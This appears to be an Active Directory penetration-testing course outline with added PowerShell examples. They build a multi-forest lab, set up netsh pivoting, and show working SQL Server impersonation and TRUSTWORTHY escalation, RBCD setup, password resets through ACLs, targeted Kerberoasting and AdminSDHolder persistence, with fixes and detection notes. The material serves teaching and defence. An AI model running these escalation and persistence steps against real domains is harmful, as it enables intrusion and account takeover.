

Exploiting Kerberos Delegations, Forest Trusts, SQL Server, ACLs, Excessive Users and Groups privilege and Many more

What you will learn

Learn how to enumerate information from Active Directory, including users, groups, computers, and trust relationships. Understand the importance of information

Learn how to abuse intended Active Directory functionality to establish a foothold and escalate privileges.

Identify common attack vectors in Active Directory, such as misconfigurations, weak passwords, and insecure group memberships. Understand how attackers exploit

Understand the importance of reconnaissance in penetration testing. Learn to use tools for AD reconnaissance, such as BloodHound and PowerView.

Explore common vulnerabilities in Active Directory, such as pass-the-hash attacks, Kerberoasting, and DCSync attacks.

Understand post-exploitation activities, including lateral movement and privilege escalation.

Understand the concept of trusts in Active Directory and how they can be exploited.

Learn about common trust-based attacks, such as Golden Ticket attacks.

Learn how to build an Active Directory lab, create forests, and configure trusts between forests.

Description

Understanding Windows Active Directory is an invaluable skill for security professionals for several compelling reasons

1 Critical Infrastructure: Active Directory is a critical component in most Windows-based networks, serving as the backbone for authentication, authorization, and resource management. Penetrating Active Directory can lead to unauthorized access to sensitive information, making it a prime target for attackers. Understanding how to test and secure it is essential for protecting overall network security.

2 Common Attack Vector: Active Directory is a common target for attackers attempting to compromise an organization’s network. Knowing how to conduct penetration testing allows security professionals to identify and address vulnerabilities before malicious actors can exploit them.

3 Risk Mitigation: By proactively testing Active Directory, security professionals can identify and mitigate potential risks and vulnerabilities. This proactive approach is essential for preventing security incidents and data breaches.




4 Career Advancement: For individuals pursuing a career in cybersecurity, having expertise in Active Directory penetration testing is a valuable skill. Employers often seek professionals who can assess and enhance the security of critical infrastructure components like Active Directory.

5 Red Team Operations: Active Directory penetration testing is a fundamental skill for red team operations. Red teams simulate real-world attacks to test an organization’s defenses, and a strong understanding of Active Directory is essential for effective red teaming.

In summary, learning Active Directory penetration testing is important for enhancing cybersecurity, preventing unauthorized access, meeting compliance requirements, and staying ahead of evolving cyber threats. It equips security professionals with the skills needed to protect critical IT infrastructure and respond effectively to security challenges.

Language: English

Content

Creating Active Directory Penetration Testing Lab

OverView
Creating VMs and Downloading Evaluation Copies of Windows Servers and Clients
Installing Windows Server 2019 as the Root Domain
Installing AD DS on ROOT-DC01
Installing and Configuring SQL Server on ROOT-DC01
Installing and Configuring the Child Domain
Installing TRUSTED-DC03 for the Forest Trust
Installing and Configuring SQL Server on TRUSTED-DC03
Installing and Configuring a Windows 10 Client Machine
Installing Windows Server 2016 as DMZ-SRV
Installing and Configuring SQL Server on DMZ-SRV
Installing Windows Server 2008 as File Server
Configuring the Trust Relationship between Forests
Creating Domain Users
Creating Groups and GPOs
Foreign Group Membership Configuration
Creating MSSQL Server Logins, Databases and Login Impersonation
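The lab-build steps above, scripted in PowerShell. This is an added example, not course material: every host name, domain name, IP address, user name and password is a placeholder chosen for the example (root.lab, child.root.lab, trusted.lab, 10.10.10.x, alice, bob, svc_sql), so substitute your own lab values. Run each part on the host named in its comment as a local Administrator; each promotion reboots the machine.

```powershell
# Added example (not course material). All names, addresses and passwords are placeholders.
$dsrm = ConvertTo-SecureString 'LabOnly-DSRM-P@ss1' -AsPlainText -Force   # placeholder DSRM password

# ---- ROOT-DC01: new forest with root domain root.lab ----
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName 'root.lab' -DomainNetbiosName 'ROOT' `
    -InstallDns -SafeModeAdministratorPassword $dsrm -Force

# ---- CHILD-DC02: child domain child.root.lab inside the root.lab forest ----
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
$rootAdmin = Get-Credential -Message 'ROOT\Administrator'
Install-ADDSDomain -NewDomainName 'child' -ParentDomainName 'root.lab' `
    -DomainType ChildDomain -NewDomainNetbiosName 'CHILD' -InstallDns -CreateDnsDelegation `
    -Credential $rootAdmin -SafeModeAdministratorPassword $dsrm -Force

# ---- TRUSTED-DC03: a second forest trusted.lab, then a two-way forest trust ----
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName 'trusted.lab' -DomainNetbiosName 'TRUSTED' `
    -InstallDns -SafeModeAdministratorPassword $dsrm -Force
# After the reboot. Each forest must resolve the other's names before the trust is created:
Add-DnsServerConditionalForwarderZone -Name 'root.lab' -MasterServers '10.10.10.1'   # ROOT-DC01 (placeholder IP)
# (and on ROOT-DC01: Add-DnsServerConditionalForwarderZone -Name 'trusted.lab' -MasterServers '10.10.10.3')
# Forest-wide, two-way trust between the two forest roots; netdom prompts for ROOT\Administrator's password.
netdom trust trusted.lab /Domain:root.lab /Add /TwoWay /Forest /UserD:ROOT\Administrator /PasswordD:*

# ---- ROOT-DC01: users, groups, a GPO, and a foreign group member ----
$userPw = ConvertTo-SecureString 'LabOnly-User-P@ss1' -AsPlainText -Force   # placeholder
New-ADOrganizationalUnit -Name 'LabUsers' -Path 'DC=root,DC=lab'
New-ADUser -Name 'alice' -SamAccountName 'alice' -Path 'OU=LabUsers,DC=root,DC=lab' `
    -AccountPassword $userPw -Enabled $true
# A service account with an SPN: this is what makes it Kerberoastable later in the course.
New-ADUser -Name 'svc_sql' -SamAccountName 'svc_sql' -Path 'OU=LabUsers,DC=root,DC=lab' `
    -AccountPassword $userPw -Enabled $true `
    -ServicePrincipalNames @('MSSQLSvc/DMZ-SRV.root.lab:1433')
# Foreign security principals can only be members of domain-local groups.
New-ADGroup -Name 'SQL-Operators' -GroupScope DomainLocal -Path 'OU=LabUsers,DC=root,DC=lab'
Add-ADGroupMember -Identity 'SQL-Operators' -Members 'alice'
New-GPO -Name 'Lab-Baseline' | New-GPLink -Target 'OU=LabUsers,DC=root,DC=lab' -LinkEnabled Yes

# Foreign group membership: a user from trusted.lab joins a domain-local group in root.lab.
# AD stores it as a foreignSecurityPrincipal object named after the user's SID.
$foreignUser = Get-ADUser -Identity 'bob' -Server 'trusted.lab'   # 'bob' must already exist in trusted.lab
Add-ADGroupMember -Identity 'SQL-Operators' -Members $foreignUser
Get-ADObject -Filter * -SearchBase 'CN=ForeignSecurityPrincipals,DC=root,DC=lab' |
    Select-Object Name, ObjectClass     # the new member appears here as its SID
```

The last query is also the enumeration step used later in the course: anything listed under CN=ForeignSecurityPrincipals is a principal from another forest that holds rights in this one.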

External Enumeration

Ports Scanning with Nmap
SMB Null Session Enumeration with smbclient, smbmap, nbtscan, rpcclient and Nmap
Bruteforcing MSSQL Server with Nmap
Bruteforcing MSSQL Server with Hydra
Bruteforcing MSSQL Server with Metasploit
Bruteforcing MSSQL Server with CrackMapExec

Code Execution and Initial Enumeration

Code Execution with CrackMapExec Using the SQL Server sa Credential
Uploading SharpView.exe to the DMZ Server Using CrackMapExec
Domain Enumeration with SharpView.exe
Getting a Foothold Using CrackMapExec with an MSSQL Credential
Getting a Foothold Using Impacket with an MSSQL Credential

Post Exploitation

Dumping System Secrets with mimikatz
Port Forwarding with the Windows-Native netsh Tool
Pivoting with chisel and proxychains
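The netsh port-forwarding step, as an added example (not course material). Addresses and ports are placeholders: the compromised host DMZ-SRV is reachable by the attacker at 10.10.10.5, and an internal SQL Server at 192.168.56.20:1433 is reachable only from DMZ-SRV. Because DMZ-SRV runs its own SQL Server on 1433 in the lab, the listener uses 14433.

```powershell
# Added example (not course material). Run on DMZ-SRV as an administrator.
# Placeholders: 192.168.56.20 = internal SQL Server, 14433 = listener port on DMZ-SRV.

# portproxy needs the IP Helper service; it is usually running, but check.
Get-Service iphlpsvc

# Forward TCP 0.0.0.0:14433 on DMZ-SRV to the internal SQL Server.
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=14433 `
    connectaddress=192.168.56.20 connectport=1433

# Windows Firewall drops the new listener's traffic unless a rule allows it.
New-NetFirewallRule -DisplayName 'lab portproxy 14433' -Direction Inbound `
    -Protocol TCP -LocalPort 14433 -Action Allow

# Verify: the mapping is registered and the port is listening.
netsh interface portproxy show v4tov4
Get-NetTCPConnection -LocalPort 14433 -State Listen

# The attacker now connects to 10.10.10.5:14433 and reaches 192.168.56.20:1433.

# Cleanup. The mapping is persistent (stored under
# HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp), which is also where
# defenders look for it, so remove both the mapping and the firewall rule when done.
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=14433
Remove-NetFirewallRule -DisplayName 'lab portproxy 14433'
```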

Internal Domain Enumeration with PowerView Python

Domain Users Enumeration with PowerView Python
Domain Groups Enumeration with PowerView Python
Domain Computers Enumeration with PowerView Python
Forest trust enumeration with PowerView Python

Internal Domain enumeration with CrackMapExec

Domain Users, Groups, Computers and Shares Enumeration with CrackMapExec

Domain Enumeration with Windapsearch

Domain Users, Groups and Computer enumeration with Windapsearch

Domain Enumeration with rpcclient

Domain Users, Groups and Computers Enumeration with rpcclient

Domain Enumeration with BloodHound

Domain Enumeration with BloodHound

Domain Privilege Escalation

AS-REP Roasting with Impacket
Kerberoasting with Impacket
AS-REP Roasting with CrackMapExec
Kerberoasting with CrackMapExec
DCSync with CrackMapExec and Impacket
Computer Unconstrained Delegation
Computer Unconstrained Delegation – Printer Bug
Computer Constrained Delegation with Impacket
Resource-Based Constrained Delegation with Impacket
LLMNR (Link-Local Multicast Name Resolution) Poisoning with Responder
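The Kerberos weaknesses this section attacks can be located with the ActiveDirectory module before the Impacket tooling is pointed at them; the example below is added here and is not course material. It ends with the RBCD configuration step. Names are placeholders: domain root.lab, attacker-owned computer account ATTACKER$, target computer FILE-SRV$.

```powershell
# Added example (not course material). ATTACKER$ and FILE-SRV$ are placeholder accounts.
Import-Module ActiveDirectory

# AS-REP roasting: accounts with DONT_REQ_PREAUTH (userAccountControl 0x400000). The KDC
# returns an AS-REP encrypted with the user's key to anyone who asks for it.
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' | Select-Object SamAccountName

# Kerberoasting: user accounts carrying an SPN. Any authenticated user can request a
# service ticket for the SPN, and that ticket is encrypted with the account's password hash.
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName |
    Select-Object SamAccountName, @{ n = 'SPN'; e = { $_.ServicePrincipalName -join ';' } }

# Unconstrained delegation: TRUSTED_FOR_DELEGATION (0x80000). Every TGT sent to such a host
# is cached there; the printer bug coerces a DC into sending its TGT to exactly such a host.
Get-ADComputer -Filter 'TrustedForDelegation -eq $true' | Select-Object Name
Get-ADUser     -Filter 'TrustedForDelegation -eq $true' | Select-Object SamAccountName

# Constrained delegation: msDS-AllowedToDelegateTo lists the target SPNs. With
# TRUSTED_TO_AUTH_FOR_DELEGATION (0x1000000, "protocol transition") the account can get a
# ticket for an arbitrary user through S4U2Self without that user ever authenticating.
Get-ADObject -Filter 'msDS-AllowedToDelegateTo -like "*"' `
    -Properties msDS-AllowedToDelegateTo, userAccountControl |
    Select-Object Name,
        @{ n = 'AllowedTo';          e = { $_.'msDS-AllowedToDelegateTo' -join ';' } },
        @{ n = 'ProtocolTransition'; e = { ($_.userAccountControl -band 0x1000000) -ne 0 } }

# Resource-based constrained delegation needs a computer account you control (a
# MachineAccountQuota above 0 lets any domain user create one) plus write access to the
# target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties 'ms-DS-MachineAccountQuota' |
    Select-Object 'ms-DS-MachineAccountQuota'
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity |
    Where-Object { $_.'msDS-AllowedToActOnBehalfOfOtherIdentity' } |
    Select-Object Name                 # computers that already have RBCD configured

# RBCD configuration step (requires the write right on FILE-SRV$): allow ATTACKER$ to act on
# behalf of other identities towards FILE-SRV. An S4U2Self + S4U2Proxy exchange authenticated
# as ATTACKER$ (for instance impacket's getST.py with -impersonate) then yields a service
# ticket to FILE-SRV as any user not marked "sensitive and cannot be delegated".
Set-ADComputer -Identity 'FILE-SRV$' -PrincipalsAllowedToDelegateToAccount (Get-ADComputer 'ATTACKER$')
Get-ADComputer -Identity 'FILE-SRV$' -Properties PrincipalsAllowedToDelegateToAccount |
    Select-Object -ExpandProperty PrincipalsAllowedToDelegateToAccount
# Revert when finished:
Set-ADComputer -Identity 'FILE-SRV$' -PrincipalsAllowedToDelegateToAccount $null
```

The same queries double as defensive checks: accounts that show up under the first three sections should be reviewed, and a non-zero MachineAccountQuota is worth setting to 0 unless something genuinely depends on it.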

Domain PrivEsc – MSSQL Server – CrackMapExec

Exploiting SQL Impersonation from the public Role to the sysadmin Role with CrackMapExec
A Little about the CrackMapExec Database

Domain PrivEsc – MSSQL Server – Impacket

Exploiting SQL Server Nested Impersonation with Impacket

Pass the Hash Lateral Movement

Pass the Hash (PtH) with CrackMapExec, Impacket, Evil-WinRM and xfreerdp

Cross-Forest Trust Attack

Cross-Forest Trust AS-REP Roasting
Cross-Forest Trust Kerberoasting
Foreign Group Membership Enumeration
Foreign Group Membership Attack

Cross-Forest Trust SQL Server Trustworthy Database Attack

Cross-Forest Privilege Escalation via a Trustworthy Database with PowerUpSQL
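Both SQL Server escalation paths in this course, the impersonation chain from the "Domain PrivEsc – MSSQL Server" sections and the TRUSTWORTHY-database attack from this section, as one added example (not course material and not PowerUpSQL's own code). It drives the T-SQL from PowerShell through System.Data.SqlClient so that no extra module is needed. The instance name DMZ-SRV, the logins lowpriv, middle and dbuser, their passwords and the database AppDb are placeholders; the setup block recreates the lab misconfiguration as sa, and the attack blocks run as the low-privileged logins.

```powershell
# Added example (not course material). Server, logins, passwords and database are placeholders.
function Invoke-Tsql {
    param([string]$Server, [string]$User, [string]$Password, [string]$Query)
    $conn = New-Object System.Data.SqlClient.SqlConnection(
        "Server=$Server;Database=master;User ID=$User;Password=$Password;")
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $Query
        $table = New-Object System.Data.DataTable
        (New-Object System.Data.SqlClient.SqlDataAdapter($cmd)).Fill($table) | Out-Null
        return $table                    # first result set of the batch
    } finally { $conn.Close() }
}
$srv = 'DMZ-SRV'                         # placeholder instance

# ---- Setup as sa: recreate the lab misconfiguration ----
Invoke-Tsql $srv 'sa' 'LabOnly-Sa-P@ss1' @"
CREATE LOGIN lowpriv WITH PASSWORD = 'LabOnly-Low-P@ss1';   -- member of public only
CREATE LOGIN middle  WITH PASSWORD = 'LabOnly-Mid-P@ss1';
CREATE LOGIN dbuser  WITH PASSWORD = 'LabOnly-Db-P@ss1';
GRANT IMPERSONATE ON LOGIN::middle TO lowpriv;   -- hop 1: lowpriv -> middle
GRANT IMPERSONATE ON LOGIN::sa     TO middle;    -- hop 2: middle  -> sa (nested impersonation)
CREATE DATABASE AppDb;
ALTER AUTHORIZATION ON DATABASE::AppDb TO sa;    -- owned by a sysadmin ...
ALTER DATABASE AppDb SET TRUSTWORTHY ON;         -- ... and trusted: the dangerous combination
USE AppDb;
CREATE USER dbuser FOR LOGIN dbuser;
ALTER ROLE db_owner ADD MEMBER dbuser;           -- attacker is only db_owner of AppDb
"@ | Out-Null

# ---- Path 1: impersonation chain, public -> sysadmin (as lowpriv) ----
# Enumerate: which logins may the current login impersonate?
Invoke-Tsql $srv 'lowpriv' 'LabOnly-Low-P@ss1' @"
SELECT pr.name AS can_impersonate
FROM sys.server_permissions pe
JOIN sys.server_principals pr ON pe.major_id = pr.principal_id
WHERE pe.permission_name = 'IMPERSONATE' AND pe.class_desc = 'SERVER_PRINCIPAL';
"@ | Format-Table                       # lists: middle
# Each EXECUTE AS is checked against the *current* context, so lowpriv -> middle -> sa
# succeeds although lowpriv was never granted IMPERSONATE on sa.
Invoke-Tsql $srv 'lowpriv' 'LabOnly-Low-P@ss1' @"
EXECUTE AS LOGIN = 'middle';
EXECUTE AS LOGIN = 'sa';
ALTER SERVER ROLE sysadmin ADD MEMBER lowpriv;   -- make the elevation permanent
REVERT; REVERT;
"@ | Out-Null
Invoke-Tsql $srv 'lowpriv' 'LabOnly-Low-P@ss1' "SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;" |
    Format-Table                         # new connection: 1

# ---- Path 2: TRUSTWORTHY database owned by sa, attacker is db_owner (as dbuser) ----
Invoke-Tsql $srv 'dbuser' 'LabOnly-Db-P@ss1' @"
SELECT d.name, d.is_trustworthy_on, SUSER_SNAME(d.owner_sid) AS owner
FROM sys.databases d WHERE d.is_trustworthy_on = 1;   -- candidates: trustworthy + owner is sysadmin
"@ | Format-Table
# A procedure created WITH EXECUTE AS OWNER runs as dbo, which maps to the owner login (sa).
# Normally that identity is confined to the database; TRUSTWORTHY lets it act at server scope.
Invoke-Tsql $srv 'dbuser' 'LabOnly-Db-P@ss1' @"
USE AppDb;
EXEC('CREATE PROCEDURE dbo.sp_elevate WITH EXECUTE AS OWNER AS
      ALTER SERVER ROLE sysadmin ADD MEMBER dbuser;');
EXEC dbo.sp_elevate;
"@ | Out-Null
Invoke-Tsql $srv 'dbuser' 'LabOnly-Db-P@ss1' "SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;" |
    Format-Table                         # 1
```

The fixes follow directly from the two preconditions: revoke IMPERSONATE grants that chain towards sysadmin logins, and either set TRUSTWORTHY OFF or give the database a low-privileged owner (a TRUSTWORTHY database owned by a non-sysadmin login gains nothing from this procedure).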

Attacking Domain Trusts – Child -> Parent Trusts

Domain Privilege Escalation from Child Domain DA to Enterprise Admin with PowerShell
Domain Privilege Escalation from Child Domain DA to Enterprise Admin with Impacket

Active Directory Persistence

Golden Ticket with Impacket
Silver Ticket with Impacket
AdminSDHolder Overview
ACL Attack > ForceChangePassword
ACL Attack > GenericWrite
AdminSDHolder ACL Attack
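The three ACL abuses in this section, as an added example (not course material) with the ActiveDirectory module, preceded by a check for who holds the dangerous rights. Placeholders: attacker account eve, victim account bob, and the domain's own DN taken from Get-ADDomain.

```powershell
# Added example (not course material). 'eve' (attacker) and 'bob' (victim) are placeholders.
Import-Module ActiveDirectory
$domainDn = (Get-ADDomain).DistinguishedName
$adminSdh = "CN=AdminSDHolder,CN=System,$domainDn"

# Who can do what on an object. ForceChangePassword is the ExtendedRight with the
# User-Force-Change-Password GUID 00299570-246d-11d0-a768-00aa006e0529; GenericWrite
# shows as GenericWrite or WriteProperty; GenericAll/WriteDacl/WriteOwner are worse.
function Get-InterestingAce([string]$Dn) {
    (Get-Acl -Path "AD:\$Dn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $_.IdentityReference -notmatch 'NT AUTHORITY|BUILTIN|Domain Admins|Enterprise Admins' -and
                       $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner|ExtendedRight' } |
        Select-Object IdentityReference, ActiveDirectoryRights, ObjectType
}
Get-InterestingAce (Get-ADUser 'bob').DistinguishedName
Get-InterestingAce $adminSdh

# ForceChangePassword on bob: reset the password without knowing the old one.
Set-ADAccountPassword -Identity 'bob' -Reset `
    -NewPassword (ConvertTo-SecureString 'LabOnly-New-P@ss1' -AsPlainText -Force)

# GenericWrite on bob: add an SPN so bob's hash can be Kerberoasted offline (targeted
# Kerberoast) without touching the password, then remove the SPN again.
Set-ADUser -Identity 'bob' -ServicePrincipalNames @{ Add = 'fake/roast.root.lab' }
#   ... request and crack the service ticket for fake/roast.root.lab, then:
Set-ADUser -Identity 'bob' -ServicePrincipalNames @{ Remove = 'fake/roast.root.lab' }

# AdminSDHolder: SDProp copies this object's ACL onto every protected account (Domain Admins,
# Enterprise Admins, krbtgt, ...) every 60 minutes by default, so an ACE added here is
# re-applied even after someone cleans the individual accounts' ACLs.
$eveSid = (Get-ADUser 'eve').SID
$acl = Get-Acl -Path "AD:\$adminSdh"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $eveSid,
    [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
    [System.Security.AccessControl.AccessControlType]::Allow,
    [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None)
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\$adminSdh" -AclObject $acl

# Trigger SDProp now instead of waiting (the task runs on the PDC emulator).
$rootDse = [ADSI]'LDAP://RootDSE'
$rootDse.Put('runProtectAdminGroupTask', '1')
$rootDse.SetInfo()

# Confirm propagation: the built-in Administrator now carries eve's ACE.
(Get-Acl -Path "AD:\$((Get-ADUser 'Administrator').DistinguishedName)").Access |
    Where-Object { $_.IdentityReference -like '*\eve' }
```

Running Get-InterestingAce against AdminSDHolder on a schedule is the cheap detection for the last technique; the ACE is the persistence, and it has to sit on that one object.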